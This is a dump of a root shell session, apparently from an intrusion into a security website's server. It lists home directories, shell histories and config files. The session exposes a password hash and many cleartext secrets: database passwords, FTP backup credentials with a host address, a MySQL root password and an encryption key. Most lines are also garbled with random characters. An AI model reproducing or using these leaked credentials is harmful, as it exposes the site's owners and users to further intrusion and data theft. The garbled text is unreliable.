+ \" T1 \8 [% [: k: ~/ T/ Vastanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::
% Z/ x( T( m% ~8 E4 f7 H3 E. B6 P2 y- ^8 A9 u! i8 [+ F( T' X, x) m
sh-3.2# cat /etc/motd
7 h/ x& Z8 u- i6 j$ @#####################################################
' M* Y+ }" m6 v. P#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #
6 |) p K1 J. j# |__| [__ | |__| | |__| | | | [__ | |__| #
0 O$ x6 \0 `" `: S0 h- Y# | | ___] | | | |___ | | \/ | ___] | | | ## ?; R& ?7 M, B8 m0 X9 d
# #
% H I5 W" D! {+ t. V#####################################################
1 ?: J e* Z6 k+ q# #* Z* p/ A: s: T
# Admin Contact - 链接标记support@secureservertech.com #& r, I H" E9 N( E l" ^( L
# #
# H9 f$ e1 ^' X" X1 p7 n$ M8 y# Available ShortCuts #
) g' d4 ]( _- b$ C# #0 J3 N0 N4 R/ R2 m
# nst - list active connections #7 L- i( ?% w5 }$ S3 K/ G+ W
# ddos - shows how many times each ip is connected #- C) x( f1 C# T, ]& ?
# ltr - restart the webserver #
$ K4 U* M( I* {" b+ u' T' _# phpc - edit the php config file #
8 Z% v$ X4 R l1 B* Y# htc - edit the webserver configuration file ## L+ r8 ~9 r: r
# up - uptime #
- H. Q2 l& `2 p5 B: A& W# etd - edit the motd of the day file #5 c3 g S, ~: t) S! S9 x4 h# B
# htr - start and restart apache if needed #
) v; w3 B9 d( |0 `9 s {# syng - shows active SYN_RECV connections #
! S% ]8 j/ N9 O) ~! p+ Y# synd - syn flood blocker - “synd -h” for usage #
0 C+ {. N! Z Z# Q. O#####################################################
9 r. `! Z- [ s; Z0 i' B( e5 Z# NOTES: #
1 O% a- w+ Q6 y* z. U. P, _5 c# Last Upgrade - 12-08-2008 by JF #
) Q) L) M) ]+ V8 G# K6 P b# My.cnf/Mysql Optimization - 1-28-09 #
" I0 l0 ~1 Z( E$ ?) ^9 ]# #4 V' U' J. N+ |" f; ?% P
# #0 s/ o3 Z( f9 x; b( ? Y4 U
# #
0 p8 o% R7 @7 A6 g#####################################################
/ j0 Q1 h* K* [6 l' N+ H" H5 Y+ V8 z* h
sh-3.2# lastlog | grep -v Never
$ C, i/ M# x" ]( P n% OUsername Port From Latest
~# M; o+ j x8 iroot pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009/ u3 n8 b5 B. b- r: h
admin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008' A) o/ i! n0 G- z: F
com pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 20095 p- w. {; q. |: A8 v& Z$ X
astanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009
' v1 T- a9 [: X5 }0 l1 A) H* s$ c0 i0 q3 y) B
sh-3.2# ls -la8 I- N1 F1 q; V- g8 f. d
total 453376% H- j% g, @7 c& f7 _, I$ y
drwxr-x— 15 root root 4096 Jun 4 08:40 .
5 O6 J6 U- s Z7 a! {) ~6 ydrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
% ^2 \! Z8 V; u3 d+ b3 C- {, m' L-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip
+ a2 k8 n5 d: H1 W M$ f" t-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg z: k8 i0 S+ u
-rw——- 1 root root 16836 Jun 4 07:21 .bash_history1 F+ `8 w6 p4 y/ Z
-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout
1 a8 A6 x3 B3 R-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile0 C- P' V* K- |& ?5 x- {* {3 p
-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc
4 Y$ t+ R9 D) T% T-rwx—— 1 root root 1899 Oct 28 2007 bk.sh2 D( r' B0 C3 r6 ?* U
-rw-r–r– 1 root root 1327 Nov 29 2007 cert. u& A9 Q/ v( D0 |6 W h
-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql
M l3 \; r* |. E( _5 h" Idrwxr-xr-x 4 root root 4096 May 20 2008 .cpan V2 |5 l4 Q- ]; p) W! Q2 X
-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc5 _. d9 N1 E+ _4 ?* U: w
-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql$ l* }6 Q1 i& w* P$ ?, V
drwx—— 2 root root 4096 Oct 28 2007 .elinks. p% Y4 e' D8 i% w6 `6 ~
drwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.11 [( c4 v9 Q9 g' C+ N2 k9 r, ?/ A0 C
-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2) Y9 G Q) A' |
-rw——- 1 root root 0 Apr 16 13:19 .history3 _" e! T: n8 O, c( h8 T
-rw-r–r– 1 root root 16095 Sep 11 2007 install.log7 d( `- A5 i9 T. `2 P+ U6 {
-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog4 `6 x# ^: c( V& J" C5 g' b2 A* g
-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh! G7 d) I' ], z" N5 ~2 q% w
-rw——- 1 root root 35 Jun 2 14:23 .lesshst! Z- v, V: X K# w& l2 Q2 A a
drwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp9 v/ R& U. x! c# M, S* M6 J
drwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec! W( f. m8 A: e% N1 T# u
-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz% Q; ^% q/ g! x" U3 {+ C
-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2- Y4 c5 V, k" `& n
-rwx—— 1 root root 760 Sep 18 2008 lp
$ L T" I; c: W+ p% E6 s; Rdrwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1/ i+ ^) v" ?3 v9 b' H5 d0 @0 e
-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz
* y- m% k& E, h s-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1! \0 V$ c: ?9 `! {# j9 F6 y+ K
drwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9; X5 {: i% L8 M- q7 Q/ R
-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz
; E1 C: E9 o+ \ mdrwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.35 |- s, x6 M$ X9 H/ e U
-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz( p* ^. O F! A/ b/ s1 z2 V( Z
-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh
3 h& R% ]9 ^* | E-rw——- 1 root root 41 Oct 19 2007 .my.cnf5 ]$ K0 x6 p: c4 j |
-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history
2 ]% q+ t3 e# f; g3 y; Y* {" B2 J-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport
- J( M8 X r. P# U) @-rw——- 1 root root 41 May 20 2008 .mytop0 v1 e$ ~+ G" l1 |) K
drwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.64 g0 R; r7 s4 Y, u, W. ~
-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz
8 z2 N& [% N7 R( F: Udrwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp
4 ]% r e$ o& ?-rw——- 1 root root 1462 Sep 21 2007 opt.php! G& i8 J7 I' E8 k# R
-rw-r–r– 1 root root 3371 Sep 22 2007 p
a# m6 F$ ^+ S-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2+ ?. K& c0 S/ O, ?' H
-rw——- 1 root root 1024 Feb 3 21:32 .rnd& K2 j+ ?4 [, |- @# D
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr, D' O+ @: \% I& E! j/ J
-rw-r–r– 1 root root 887 Nov 28 2007 server.key
1 N9 @% ?5 Z& j* q% m* Q+ k) ndrwx—— 2 root root 4096 Oct 10 2008 .ssh
) l( G L" E6 e-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat; x; h' O" u3 g; q8 J
-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc
* [" l1 B2 S: }& ]6 q0 r3 C0 e-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip
- ?& {- T$ {" {2 T3 S-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1
( w( I0 u S9 q3 s7 ?, J% a; l! `drwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp
1 `7 p: H0 m. V8 B# c-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh
% z5 H& Y+ O( g7 N4 gdrwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0& _, n0 M7 T0 n0 F
-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2( B4 p) f: l" ?* g2 ]
-rw——- 1 root root 12997 May 16 2008 .viminfo5 Z" j! E2 D/ N* ^+ G
- O6 _; {; e, K" _( }: u2 o" j1 |sh-3.2# cat .bash_history
+ v) `# e0 S+ }5 p. e. l1 C[snip]8 g7 z; }. ]& D6 v% M& {
wget cp4sst.com/sstlinux.tar.gz
8 l, u0 w2 a7 G" n G7 htar zxvf sstlinux.tar.gz
7 u$ ~1 t8 Q5 g1 v5 }. N) rcd linux-2.6.27.10
$ `, C+ e* Q0 ish install.sh
$ L4 @7 }/ |- E) vmake bzImage ; make modules ; make modules_install ; make install! c: S( O0 I* L
make clean
% J3 H4 v. P% f* ^8 aservice mysqld restart3 W+ h# h( E" S) L
[snip]
. l: {, s, K% p" u4 S, kcd /usr/sbin/
& \$ C$ o7 j/ c9 C' |) Hchmod 4777 traceroute
: l$ p/ I+ ~9 ^+ B# echmod 4777 ping( z( }( z& w+ |8 _- s) w+ H; j7 N
traceroute -I 链接标记[url]www.astalavista.ch[/url]% U2 J$ l2 t* l$ f7 a3 ^8 h9 |
[snip], p# Y+ S5 S9 @( v9 C5 S0 W2 V
vi /etc/csf/csf.conf
4 q5 _( c) u0 i2 H; htraceroute google.ch
2 L7 b7 u1 t9 f4 xservice csf restart1 m2 ~+ |- }9 J! a) ^
tracert google.ch
9 Z) H0 ~6 @: _" s5 }/ D) D( Eservice csf restart! _% p; B& E7 p8 \, m6 \3 _, u; y% P- [
traceroute 链接标记[url]www.google.ch[/url]$ x* y9 U6 g2 T3 u) `- x4 w* `
tracert 链接标记[url]www.google.ch[/url]
* H- S _' x# ^# h$ ttraceroute 链接标记[url]www.google.ch[/url]( ?# T+ n: c% g1 Y' ~6 ^
locate traceroute9 S+ G6 h1 ~ [- ^$ S
chown 4755 /bin/traceroute
6 ^* j/ j1 H( F- j6 M6 w* P$ o% ~chown 4777 /bin/traceroute& R, q# u2 [* ~5 V
locate ping
# L# g0 i$ y) ?chown 4755 /bin/ping
. H$ w% p% o6 s$ y7 O$ J- B4 {3 N3 Rchown 4777 /bin/ping, O4 g2 J o* @+ \8 L
cd /bin/3 Y5 z1 I' t% l* `* `
ls -ali | grep ping* q3 n. E# Y* C6 b
chown root ping
( L+ H" u3 ?9 v9 k$ z3 \! U/ Fchmod 4755 ping: M R* \1 a9 _# \
ls -ali | grep traceroute* ?4 C% b! y7 ^' A+ i, S$ X
chown root traceroute' [2 U) O% y6 |/ f+ d) D
chmod 4755 traceroute3 M: G& U) S8 V
ls -ali | grep traceroute
/ z% @. x, h9 ^& L ztraceroute -I 链接标记[url]www.google.ch[/url]
! T; H0 A5 K- d$ n5 g6 \2 ? Ytraceroute 链接标记[url]www.google.ch[/url]
" x) r+ j' H' K" Owhois pmsantos.ch
( `# D, c4 \7 _ ^& z5 r" J7 \[snip]- W4 i: j7 i5 q1 \, K
mysql -h com_contrexx2_live < /root/defaultp_ports.sql
$ H( J& o3 Z( u) |3 S2 }9 ~) Tmysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql+ c1 A, S8 r( F$ {( l. E
mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql/ ]* l8 [2 i9 z% \+ q6 m& M. \
mysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql4 F. v: L( j7 O3 u# D [
top2 N8 f' g) L! J: |* [) H2 S. k
ping ssth.ch* O4 W1 T" \8 J, e) F, t
ping asdlkfaljgasd???ljg???lasj.ch
' ?4 z' w3 l. sping asdlkfaljgasdlasj.ch( H! V: @# s7 o3 h
ping 链接标记[url]www.ssth.ch[/url]' V6 w& W+ l3 c
ping ssth.ch
- p6 l5 H! D9 a- F) Gnslookup 链接标记[url]www.google.ch[/url]6 Q# Q) f+ p# z& s- \
nslookup 链接标记[url]www.ssth.ch[/url]$ i9 A1 \9 V- t1 ]! f
man nslookup
: g& H' P8 h. O- ?2 Lping 链接标记[url]www.google.ch[/url]! v8 H) A* {; E! v9 u* M
nslookup 链接标记[url]www.google.ch[/url]
* K4 W( f* ~2 s( n1 i K) k% Ynslookup 链接标记[url]www.google.ch[/url]- ^- S) A' N( i4 X
nslookup salfjasdlf.ch6 d. Q2 r/ F, I7 r9 S9 u+ s! e
[snip]8 @' y( Q. J3 {, e$ @7 y& E& ]
openssl passwd -1 sadf
. \/ v& l+ d N) k8 popenssl passwd -1 5cZNHstdTy* p; Q$ g {! a( Z8 W
mysql
_( u9 O1 o) X6 f8 gmysql0 P! P1 f! L- D9 F/ T7 t* S: a( t
locate proftp
1 U; d8 d" g3 i. ?3 Avi /etc/proftpd.passwd7 n7 \. k( G% r
service proftpd restart
/ Z- t% j0 |; R' Qlocate proftpd.conf* c6 R5 x# J f, ]2 {' L1 d. f: P
vi /etc/proftpd.conf
7 R2 w5 @0 U4 C0 \vi /etc/proftpd.passwd
0 {0 H& G3 u7 sservice proftpd restart
7 H$ M0 z) _+ q& f+ l[snip]$ ]9 P, ~" a& s) z: ]( A2 B
/bin/sh /home/com/backup_system/backup.sh
, g7 z3 C3 i, }8 a5 f6 Ztar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin
( T% ~3 M( ]6 o1 Bmysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql
, z5 r+ [! a8 rmysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql
7 b% o, [/ L4 S7 }) ~2 yls -ali
9 a3 A1 q! E+ T3 Vmysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql
" W7 m0 w( K2 `1 x. K9 M- ymysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql: _! D5 G& d9 r5 X; _8 T3 X
crontab -l
0 O# g. b4 Q- ~4 }9 i! Jcrontab -l
9 `8 K4 C, l3 Y' Y4 ]php -q /home/com/public_html/modifications/cronjobs/securitynews.php
, w3 J6 s1 ?/ Z, _/home/com/public_html/modifications/cronjobs/exploits.sh
( [1 i- \+ F% N4 [0 @! Pwget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]
* Z {5 {% j' q+ ]) Star zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz
" N, O$ T+ h$ M1 x3 V, V. ecd lsws-4.0.3
# @! |7 z6 }- {; @2 q6 Q7 dsh install.sh% R2 `5 |# j2 _& S P
uptime4 `7 d" k# S2 u8 ^9 t
hdparm -tt /dev/sda- K% g0 ^; b- u- u
iostat
; q {& F2 M. x" Cyum install iostat6 n& R {1 U/ V
iostat7 w1 R+ Q! b! g: o* _; p
whereis iostat
9 g h4 {& n) e9 i" ]( X+ Y1 kyjm clean all2 p4 ^ p C; V V0 |
yum clean all ; yum -y update1 [0 L$ @$ K. n b F$ z) T
iostat( Y! R9 Q0 `( @, H
yum install systat
! A7 X5 Q, `- c$ K; trpm -qa | grep iostat
0 g5 z4 w+ T' _% M; v2 Y& mrpm -qa | grep sysstat
# }5 x6 x1 J( O2 A6 p7 frpm -qa | grep systat
9 B& Y& a0 K: f3 _; odmesg -c# o* W. E, k+ C
sysctl -p
5 O. b, j; I. J" E( h% }uname -r" v' C: ?& {7 {$ b; K8 Z% b
cd /usr/src
' ~- ?9 k& d9 u/ W& X8 a, a) mwget nix101.com/kernels/sstlinux.tar.gz8 `. j, B' ]- u# M" e* f
shutdown -r now+ g1 s9 f6 J4 s! J2 S
nano -w /boot/grub/grub.conf! R4 O% ^; Q! ?0 T- b
7 ?- E; h3 t! {sh-3.2# cat .my.cnf" W- _# d& O; g1 q
[client]9 j" f2 E* [. B. Y8 B) |) y4 W
user=da_admin; s, S) s2 E5 t
password=X9dctmRH9 s# S$ Y. u0 W8 F8 m
. l; Y) U2 S: N- d
sh-3.2# cat /home/com/backup_system/backup.sh
. x* z# U9 B$ Q! f- G+ f% a#!/bin/sh( Y$ _8 t5 p: P/ P
#####################################################################
6 u# @4 R8 f% n; Y! w# ## x. a$ r+ b% p% M8 c
# incremental backup for astalavista.com #
9 Z: w0 n; I. J' b# #
! _5 C+ x) {9 K' @% x# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #3 ~$ b7 M% [/ t* ?6 B8 ]
# #
7 z- Y4 v+ E# ~# E% Z- }$ N- g- w% P#####################################################################
; Q9 A2 r7 X, i# \; m* O+ U[snip]0 U5 c' T! h) _
PROG_DIR=”/home/com/backup_system”; l5 v8 v- H% P! d
BACKUP_DIR=”/home/com/backups”;
4 n4 N) |# {7 A0 A+ v- s9 IDOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;
8 i3 Y7 W, n" A# s# ftp for synology backup server
* t$ Y, k! J+ d. {6 R- S, EFTP_HOST=”212.254.194.163″;
. [ Z# {* ~: T- l: D. |5 i6 QFTP_PORT=”21″;
0 T0 w2 Y: ]( W; wFTP_USER=”astalavista.com”;4 P- X$ \; v5 l; W9 V
FTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;
, A" C0 h( R* S' m5 u* sFTP_DIR=”/astalavista.com”;
7 q4 q" d* y6 K* T S. ] ]# database
' l' [3 h; Y. f1 ?' o6 _" u' d6 WDB_HOST=”localhost”;1 I: S9 |, N1 ^ d# p0 e3 e
DB_USER=”contrexxuser2″;
) w" z1 y' Z. |8 w. j& s2 b$ P# qDB_PASS=”0fEYNZgXz1pKe”;0 \ @$ s- g. K5 ?7 {/ Q/ ~
DB_DATABASE1=”com_contrexx2_live”;+ v9 ]; X) S* e$ r3 a6 S6 v# i7 [: e0 @
DB_DATABASE2=”com_contrexx2″;
# J* c" o% ~; \: \' `[snip]6 w3 K; X6 ]* ~! d
ftp -in $FTP_HOST $FTP_PORT <<EOF4 a" i4 x7 d( f9 G% S
quote USER $FTP_USER% K" K" G- U; P- M2 ~$ l5 B
quote PASS $FTP_PASS
! v( m; t7 G$ S7 {8 ~cd $FTP_DIR
3 f2 K8 I4 d5 ?3 M, j# T* ?put $DB_FULLNAME-SQL_Dump.tar
2 d- E. P6 L2 V* d0 o# g# eput $BACKUP_FULLNAME-Public_HTML.tar9 W% Q0 N9 N' ]
close
5 c: J4 }9 l1 X9 S6 s1 Ebye) X$ z3 a# J4 d, G1 i, c) E' @
EOF, u: N1 V8 {8 N8 b- p3 o
: x* Q) R; }, S" S, b! W3 hsh-3.2# cd /home
5 [, {' g" p! l& u" i( Jsh-3.2# ls -la
+ [; Q" m6 v8 d, r5 d. C/ Ptotal 120
) r7 j$ T4 P, [3 ]( [ ddrwxr-xr-x 14 root root 4096 Mar 11 17:56 .
+ e, F* A5 X* |. A0 B8 vdrwxr-xr-x 25 root root 4096 Jun 3 02:43 .." X8 A# }( c0 ~/ j: X: Y1 J6 s' s
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin6 J$ I' c# D4 X
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group4 ~+ F2 @6 X9 i: z: u8 q% |; p
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user/ y: N7 V3 v3 S! h W7 z3 y
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
6 s/ R: r% x+ E' y# B, Ydrwxr-xr-x 2 root root 4096 Jul 29 2008 backup9 O$ ^0 ?# o* r$ [3 g
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161( ^/ L2 x5 v* H( j* b1 W) {( k/ J: r3 o
drwx–x–x 10 com com 4096 Apr 28 12:40 com6 g- r/ t; M2 X6 E+ X" Q1 s d, U; G
drwxr-xr-x 2 root root 4096 May 17 2007 ftp
L2 V& B: c4 w9 ~3 I0 Idrwx—— 3 jon jon 4096 Sep 21 2007 jon! {9 R. X8 i+ [, O! G
drwx—— 2 root root 16384 Sep 11 2007 lost+found
+ }$ s7 q8 ^$ S3 ]; x7 Qdrwxr-xr-x 2 root root 4096 Sep 14 2007 my5 r2 X) a. M4 X& i9 I
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata: z+ e7 Z& {0 b+ K3 s5 {
drwx—— 2 jon jon 4096 Sep 15 2007 test& J( `- @5 M; u+ p
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp- t3 J4 \* q m6 V4 Z+ I
3 k% v) _ z; Y9 u7 N/ Tsh-3.2# cd admin; v: ` f0 ?% n: x% t
sh-3.2# ls -la- ^+ y: j n) H+ }
total 1735896
% k) B. k; h, C( G# a. |9 [- Adrwx–x–x 9 admin admin 4096 Nov 28 2007 .' `( M1 r: [4 h; [9 y; V( B
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..8 A. [' U: p& R1 M4 k3 x) y
drwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups" H& [2 |2 P4 e# H2 O& N( m
drwx—— 2 admin admin 4096 Sep 28 2007 backups
* h J9 u1 J1 `6 \. }3 q-rw——- 1 admin admin 860 Sep 17 2008 .bash_history
' u* v; y( M6 e& t, x9 i-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout
. V& K* N, {0 X4 B2 ?9 ]-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile
# k( o9 O" [1 u6 `, C-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc
. z: N. S, _8 |# k5 n7 Kdrwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups
) s' @* I4 |2 F/ J; ]" odrwx–x–x 6 admin admin 4096 Sep 21 2007 domains
4 [% w2 W/ u/ \/ ^, ~/ F9 gdrwxrwx— 3 admin mail 4096 Sep 21 2007 imap) x' H! H& O8 o5 ]- H. X
-rw-r–r– 1 root root 24 Sep 21 2007 info.php+ ^8 x8 r* i; x& b/ {2 g
drwx—— 2 admin admin 4096 Sep 21 2007 mail2 M3 Z2 t, ^1 @ z
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
; H$ \: g2 P. Q# G' N-rw-r–r– 1 root root 887 Nov 28 2007 server.key5 a5 L% u' R1 ~" z6 n( H
-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow0 v+ a; x0 {* _ b
-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz Q' M1 ^& x+ K5 A, f! T( e9 K
drwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups; V! q' u' k$ G; f$ B
. t) G) ~, y: R3 @sh-3.2# ..
' a1 i0 Y8 |4 csh-3.2# cd jon* {4 u5 L. N$ s2 V) e7 z
sh-3.2# ls -la; [) ]8 Y8 l1 f3 H8 W2 L, S
total 36
' a) N% o$ |: N3 _. n; l& Wdrwx—— 3 jon jon 4096 Sep 21 2007 .
, N! u& f. @8 E+ m0 D, qdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..; f1 {0 t' }" j' Z6 g W- Y& }6 F
-rw——- 1 jon jon 53 Sep 21 2007 .bash_history% C: O; K7 V E( ]$ X
-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout! _* J6 p0 ? p0 Q* E9 Z5 v7 r
-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile
% ]% g U' b$ X+ m-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc% `: @5 f9 m: k0 r; C( u0 L
-rw-r–r– 1 root root 24 Sep 21 2007 info.php
. s. @# u% f4 _- ~4 \drwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html
# I$ E0 U( L7 | `
d2 J" k( ~' @, h msh-3.2# cd ..
- ]% B0 y& u# D* V$ _' X+ y9 qsh-3.2# cd test1 Y Y: x/ A d3 w. x* t
sh-3.2# ls -la X. S- i8 {! O& X$ w1 m
total 48
' E# l+ K& u3 T; Edrwx—— 2 jon jon 4096 Sep 15 2007 ./ L$ d: a% p# R Q: h- c3 u
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
' W% x: |& V$ {$ z/ N7 _5 g9 b-rw——- 1 jon jon 79 Sep 21 2007 .bash_history; R+ D4 m$ D1 p$ ~
-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout
! u; \/ m. Y4 T( ?+ G) I+ k-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile# g- t! b3 ]" `! h: N; F* h3 j
-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc6 n7 f' O4 j% n- {
sh-3.2# cat .bash_history
. J f7 {8 R+ F( R/usr/bin/mysqladmin -u root password PoliuJhytg67
! V9 ~; [5 j) [- `9 E0 m! ?& t( T! i
sh-3.2# cd ..
+ ^+ w9 M4 k- @" `sh-3.2# cd astanet+ ^+ |/ O7 X7 m0 K/ H* y3 t- m
sh-3.2# ls -la2 C5 J. m! `/ }' E
total 52
+ A: D. f: j( v# @! T8 b: D* [drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .
1 H" g6 Q0 V2 ?5 bdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..0 v. d9 t) _8 ~( p2 k
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth+ A& V. U% c% T! _
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history/ S' ]1 A8 U0 Q" D
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
( B$ Q0 H5 ~+ C' b& K7 Q-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile" g4 j! I0 M: g! d
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc2 o5 w1 i3 w: C O( C5 Q
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
% |4 B% `( L$ X/ ~4 w$ S6 P8 T x$ Sdrwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap. Q+ l$ F8 U( D0 K9 O0 e) v. j
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
2 n8 L7 ~1 \& T- z2 a" H: {-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history/ H% L# W; D" Q: y$ ]
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
4 D+ f' V3 t6 J# i+ ]: N-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow9 @! m) l) F1 e% u! T6 ?$ k
: j2 q9 u! ^3 y7 M# X4 _sh-3.2# cd auth/8 P5 Z$ |4 L) w- E
sh-3.2# ls -la0 E- d; J% K1 m3 K/ F
total 28
+ ?9 e- N6 J3 q6 Ndrwxr-xr-x 2 root root 4096 Dec 23 16:00 .! K/ c1 N+ a5 a5 D& q: j( H4 q
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..
3 u2 j1 E1 e1 U' u' p! e-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php3 |1 @9 M# K0 Y6 N' z" `- B2 Z7 k: }
-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php# ^5 L1 L- Y2 r8 D, F$ T; p) d* I
-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd
7 Y4 S; O T# Q5 R- t-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting2 Z$ D) G9 N7 _7 W! e& h$ k
-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd3 T! |# n: m) |: o* v5 C) E
- P4 b& O$ ?- {& U/ F8 f
sh-3.2# cat hackercontest.config.inc.php
8 C4 b7 |7 D4 h/ m; b2 M- G<?PHP
9 N+ j5 I1 r& |$ a, _& e// Variabeln f?r Verbindung zur Datenbank //* U1 T+ u3 u+ U+ n
$conxHost = ‘localhost’; // MySQL hostname% V2 X! z. C6 w0 Y4 S! o3 e
$conxUser = ‘hackercontest’; // MySQL user
. f7 W+ p* I8 m# i1 y$conxPassword = ‘K6m@7dUc’; // MySQL password
& z8 X5 _, ]2 e9 {& }! j1 Z. w$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
! Y. ?- ^8 _# v?>
* y9 E9 ~) T! [9 A5 [ O( D, jsh-3.2# cat hosting.config.inc.php2 J: h1 T4 U: K# F5 w6 l7 N
<?PHP
# g6 \+ D9 k( ~' G6 o// Variabeln f?r Verbindung zur Datenbank //, e# |% }9 f2 O8 M! O# j9 @1 p' O6 E: c
$conxHost = ‘localhost’; // MySQL hostname
5 h9 D$ T2 H8 i4 ^& Z" i$conxUser = ‘hostinguser’; // MySQL user
* {- O) n- U7 O' z! [$conxPassword = ‘cXvB3981′; // MySQL password
